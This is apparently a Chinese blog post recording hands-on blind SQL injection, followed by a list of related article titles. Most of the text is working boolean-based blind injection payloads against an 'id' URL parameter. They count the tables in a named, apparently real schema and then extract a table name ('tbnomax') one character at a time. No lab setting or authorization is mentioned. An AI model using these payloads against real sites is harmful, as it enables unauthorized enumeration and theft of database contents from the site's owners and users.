實戰2-注入
主頁面無論輸入什麼都不顯示錯誤,進去下面這個頁面,會有報錯資訊。
聯合查詢、報錯兩種方法爆出來的表不完整,,所以用布林型盲注的方法。
/?id=24 and (select count(table_name) from information_schema.tables where table_schema='u9897uwx_kabel') =22 %23 //22張表
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),1,1))=116%23 t
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),2,1))=98%23 b
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),3,1))=110%23 n
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),4,1))=111%23 o
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),5,1))=109%23 m
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),6,1))=97%23 a
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),7,1))=120%23 x
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),8,1))=0%23 //空格,說明表的名字已經爆完了
資料庫最後一張表為 tbnomax
相關文章
- 實戰1-注入
- Laravel —— 服務注入實戰案例Laravel
- .NET Core 實戰筆記2-從命令開始筆記
- Windows提權實戰————4、DLL注入Windows
- 【Spring實戰】—— 2 構造注入Spring
- RAG實戰2-如何使用LlamaIndex儲存和讀取向量AIIndex
- [Python3網路爬蟲開發實戰] 2-爬蟲基礎 2-網頁基礎Python爬蟲網頁
- .Net Core後端架構實戰【2-實現動態路由與Dynamic API】後端架構路由API
- 實戰記錄之SQL server報錯手工注入SQLServer
- Kustomize 生產實戰-注入監控 APM Agent
- 日誌系統實戰(一)—AOP靜態注入
- WPF進階技巧和實戰09-事件(2-多點觸控)事件
- nestjs後端開發實戰(一)——依賴注入JS後端依賴注入
- 【Python3網路爬蟲開發實戰】3-基本庫的使用 2-使用requests 2-高階用法Python爬蟲
- 【半小時大話.net依賴注入】(一)理論基礎+實戰控制檯程式實現AutoFac注入依賴注入
- MVC + EFCore 專案實戰 - 數倉管理系統2- 搭建基本框架配置EFCoreMVC框架
- 信安實踐2-增加zoobars個數
- XML實體注入漏洞XML
- 【半小時大話.net依賴注入】(下)詳解AutoFac+實戰Mvc、Api以及.NET Core的依賴注入依賴注入MVCAPI
- 【深入淺出Spring原理及實戰】「原始碼原理實戰」從底層角度去分析研究PropertySourcesPlaceholderConfigurer的原理及實戰注入機制Spring原始碼
- 實戰指南:使用 xUnit.DependencyInjection 在單元測試中實現依賴注入【完整教程】依賴注入
- 《redis設計與實現》2-資料庫實現篇Redis資料庫
- DataV實戰#2-無互動事件元件資料來源查詢時間變數傳遞技巧事件元件變數
- 2-配置tabbartabBar
- iOS實現依賴注入iOS依賴注入
- 依賴注入?依賴注入是如何實現解耦的?依賴注入解耦
- Docker 從入門到實踐-2-基本概念Docker
- hadoop實戰2-更改指定hostname啟動hadoop,jps介紹,yarn部署,yarn上執行程式HadoopYarn行程
- Redis核心原理及讀寫一致企業級架構深入剖析2-綜合元件環境實戰Redis架構元件
- 集合框架2- ArrayList框架
- 機器學習2-特徵工程機器學習特徵工程
- Vue路由自動注入實踐Vue路由
- PHP 依賴注入容器實現PHP依賴注入
- 依賴注入實現元件化依賴注入元件化
- [Python3網路爬蟲開發實戰] 2-爬蟲基礎 1-HTTP基本原理Python爬蟲HTTP
- 基於AWR實現STATSPACK報告(2-系統效率)
- 批量監控主機方法2-使用rhost來實現
- Spring注入:配置注入(set注入和構造器注入)與註解注入Spring